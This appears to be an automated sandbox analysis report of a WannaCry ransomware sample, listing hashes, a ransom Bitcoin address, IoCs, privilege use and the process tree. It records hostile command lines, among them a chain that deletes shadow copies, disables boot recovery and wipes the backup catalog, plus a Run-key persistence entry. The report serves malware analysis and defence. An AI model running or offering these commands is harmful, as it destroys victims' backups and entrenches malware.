Resubmissions
13-04-2021 15:20
210413-erpdk5746n 1007-04-2021 20:23
210407-3w1xnp3sxx 1030-03-2021 12:44
210330-rxae2gpzkn 1015-03-2021 03:56
210315-v77jkyypdj 1012-03-2021 14:39
210312-v91t4rfeva 1009-03-2021 16:31
210309-jarv33yz26 1008-03-2021 18:16
210308-nb95m4v9c6 1004-03-2021 16:33
210304-wah1ytdaa6 1004-03-2021 15:26
210304-v2jw3mqwkj 1003-03-2021 02:26
210303-eg4g1z4wd2 10Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
12-08-2020 13:21
Static task
static1
Behavioral task
behavioral1
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10v200722
General
-
Target
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
-
Size
3.4MB
-
MD5
84c82835a5d21bbcf75a61706d8ab549
-
SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
-
SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
-
SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\@[email protected]
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 16 IoCs
pid Process 1324 taskdl.exe 2760 @[email protected] 3624 @[email protected] 568 taskse.exe 904 @[email protected] 808 taskdl.exe 3200 taskhsvc.exe 2740 taskdl.exe 3872 taskse.exe 3464 @[email protected] 1672 taskdl.exe 1964 taskse.exe 2016 @[email protected] 3604 taskse.exe 3172 taskdl.exe 1836 @[email protected] -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\BlockOut.raw.WNCRYT => C:\Users\Admin\Pictures\BlockOut.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\EditPop.png.WNCRYT => C:\Users\Admin\Pictures\EditPop.png.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\EditPop.png.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\MergeConnect.raw.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Pictures\MergeConnect.raw.WNCRYT => C:\Users\Admin\Pictures\MergeConnect.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\MergeConnect.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\BlockOut.raw.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Pictures\BlockOut.raw.WNCRY ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created C:\Users\Admin\Pictures\EditPop.png.WNCRYT ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDA311.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDA2EB.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Loads dropped DLL 7 IoCs
pid Process 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1908 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\yitnqofnjvk729 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe -
JavaScript code in executable 5 IoCs
resource yara_rule behavioral2/files/0x000100000001af92-65.dat js behavioral2/files/0x000100000001af92-66.dat js behavioral2/files/0x000100000001af89-69.dat js behavioral2/files/0x000100000001af89-78.dat js behavioral2/files/0x000100000001af89-79.dat js -
Modifies service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3884 vssadmin.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1008 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe 3200 taskhsvc.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeTcbPrivilege 568 taskse.exe Token: SeTcbPrivilege 568 taskse.exe Token: SeBackupPrivilege 3532 vssvc.exe Token: SeRestorePrivilege 3532 vssvc.exe Token: SeAuditPrivilege 3532 vssvc.exe Token: SeIncreaseQuotaPrivilege 3880 WMIC.exe Token: SeSecurityPrivilege 3880 WMIC.exe Token: SeTakeOwnershipPrivilege 3880 WMIC.exe Token: SeLoadDriverPrivilege 3880 WMIC.exe Token: SeSystemProfilePrivilege 3880 WMIC.exe Token: SeSystemtimePrivilege 3880 WMIC.exe Token: SeProfSingleProcessPrivilege 3880 WMIC.exe Token: SeIncBasePriorityPrivilege 3880 WMIC.exe Token: SeCreatePagefilePrivilege 3880 WMIC.exe Token: SeBackupPrivilege 3880 WMIC.exe Token: SeRestorePrivilege 3880 WMIC.exe Token: SeShutdownPrivilege 3880 WMIC.exe Token: SeDebugPrivilege 3880 WMIC.exe Token: SeSystemEnvironmentPrivilege 3880 WMIC.exe Token: SeRemoteShutdownPrivilege 3880 WMIC.exe Token: SeUndockPrivilege 3880 WMIC.exe Token: SeManageVolumePrivilege 3880 WMIC.exe Token: 33 3880 WMIC.exe Token: 34 3880 WMIC.exe Token: 35 3880 WMIC.exe Token: 36 3880 WMIC.exe Token: SeIncreaseQuotaPrivilege 3880 WMIC.exe Token: SeSecurityPrivilege 3880 WMIC.exe Token: SeTakeOwnershipPrivilege 3880 WMIC.exe Token: SeLoadDriverPrivilege 3880 WMIC.exe Token: SeSystemProfilePrivilege 3880 WMIC.exe Token: SeSystemtimePrivilege 3880 WMIC.exe Token: SeProfSingleProcessPrivilege 3880 WMIC.exe Token: SeIncBasePriorityPrivilege 3880 WMIC.exe Token: SeCreatePagefilePrivilege 3880 WMIC.exe Token: SeBackupPrivilege 3880 WMIC.exe Token: SeRestorePrivilege 3880 WMIC.exe Token: SeShutdownPrivilege 3880 WMIC.exe Token: SeDebugPrivilege 3880 WMIC.exe Token: SeSystemEnvironmentPrivilege 3880 WMIC.exe Token: SeRemoteShutdownPrivilege 3880 WMIC.exe Token: SeUndockPrivilege 3880 WMIC.exe Token: SeManageVolumePrivilege 3880 WMIC.exe Token: 33 3880 WMIC.exe Token: 34 3880 WMIC.exe Token: 35 3880 WMIC.exe Token: 36 3880 WMIC.exe Token: SeTcbPrivilege 3872 taskse.exe Token: SeTcbPrivilege 3872 taskse.exe Token: SeTcbPrivilege 1964 taskse.exe Token: SeTcbPrivilege 1964 taskse.exe Token: SeTcbPrivilege 3604 taskse.exe Token: SeTcbPrivilege 3604 taskse.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 904 @[email protected] -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 3624 @[email protected] 2760 @[email protected] 3624 @[email protected] 2760 @[email protected] 904 @[email protected] 904 @[email protected] 3464 @[email protected] 2016 @[email protected] 1836 @[email protected] -
Suspicious use of WriteProcessMemory 78 IoCs
description pid Process procid_target PID 3740 wrote to memory of 3720 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 66 PID 3740 wrote to memory of 3720 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 66 PID 3740 wrote to memory of 3720 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 66 PID 3740 wrote to memory of 1908 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 67 PID 3740 wrote to memory of 1908 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 67 PID 3740 wrote to memory of 1908 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 67 PID 3740 wrote to memory of 1324 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 70 PID 3740 wrote to memory of 1324 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 70 PID 3740 wrote to memory of 1324 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 70 PID 3740 wrote to memory of 1508 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 71 PID 3740 wrote to memory of 1508 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 71 PID 3740 wrote to memory of 1508 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 71 PID 1508 wrote to memory of 1812 1508 cmd.exe 73 PID 1508 wrote to memory of 1812 1508 cmd.exe 73 PID 1508 wrote to memory of 1812 1508 cmd.exe 73 PID 3740 wrote to memory of 2760 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 3740 wrote to memory of 2760 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 3740 wrote to memory of 2760 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 3740 wrote to memory of 3364 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 79 PID 3740 wrote to memory of 3364 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 79 PID 3740 wrote to memory of 3364 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 79 PID 3364 wrote to memory of 3624 3364 cmd.exe 81 PID 3364 wrote to memory of 3624 3364 cmd.exe 81 PID 3364 wrote to memory of 3624 3364 cmd.exe 81 PID 3740 wrote to memory of 568 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 83 PID 3740 wrote to memory of 568 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 83 PID 3740 wrote to memory of 568 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 83 PID 3740 wrote to memory of 904 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 84 PID 3740 wrote to memory of 904 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 84 PID 3740 wrote to memory of 904 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 84 PID 3740 wrote to memory of 740 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 85 PID 3740 wrote to memory of 740 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 85 PID 3740 wrote to memory of 740 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 85 PID 3740 wrote to memory of 808 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 86 PID 3740 wrote to memory of 808 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 86 PID 3740 wrote to memory of 808 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 86 PID 740 wrote to memory of 1008 740 cmd.exe 89 PID 740 wrote to memory of 1008 740 cmd.exe 89 PID 740 wrote to memory of 1008 740 cmd.exe 89 PID 2760 wrote to memory of 3200 2760 @[email protected] 90 PID 2760 wrote to memory of 3200 2760 @[email protected] 90 PID 2760 wrote to memory of 3200 2760 @[email protected] 90 PID 3624 wrote to memory of 3916 3624 @[email protected] 96 PID 3624 wrote to memory of 3916 3624 @[email protected] 96 PID 3624 wrote to memory of 3916 3624 @[email protected] 96 PID 3916 wrote to memory of 3884 3916 cmd.exe 98 PID 3916 wrote to memory of 3884 3916 cmd.exe 98 PID 3916 wrote to memory of 3884 3916 cmd.exe 98 PID 3916 wrote to memory of 3880 3916 cmd.exe 100 PID 3916 wrote to memory of 3880 3916 cmd.exe 100 PID 3916 wrote to memory of 3880 3916 cmd.exe 100 PID 3740 wrote to memory of 2740 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 102 PID 3740 wrote to memory of 2740 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 102 PID 3740 wrote to memory of 2740 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 102 PID 3740 wrote to memory of 3872 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 103 PID 3740 wrote to memory of 3872 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 103 PID 3740 wrote to memory of 3872 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 103 PID 3740 wrote to memory of 3464 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 104 PID 3740 wrote to memory of 3464 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 104 PID 3740 wrote to memory of 3464 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 104 PID 3740 wrote to memory of 1672 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 106 PID 3740 wrote to memory of 1672 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 106 PID 3740 wrote to memory of 1672 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 106 PID 3740 wrote to memory of 1964 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 107 PID 3740 wrote to memory of 1964 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 107 PID 3740 wrote to memory of 1964 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 107 PID 3740 wrote to memory of 2016 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 108 PID 3740 wrote to memory of 2016 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 108 PID 3740 wrote to memory of 2016 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 108 PID 3740 wrote to memory of 3604 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 110 PID 3740 wrote to memory of 3604 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 110 PID 3740 wrote to memory of 3172 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 109 PID 3740 wrote to memory of 3604 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 110 PID 3740 wrote to memory of 3172 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 109 PID 3740 wrote to memory of 3172 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 109 PID 3740 wrote to memory of 1836 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 111 PID 3740 wrote to memory of 1836 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 111 PID 3740 wrote to memory of 1836 3740 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3720 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:3720
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 311711597245713.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3200
-
-
-
C:\Windows\SysWOW64\cmd.exePID:3364
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3884
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:904
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "yitnqofnjvk729" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f2⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "yitnqofnjvk729" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:1008
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:808
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:3464
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1672
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:3172
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1836
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3532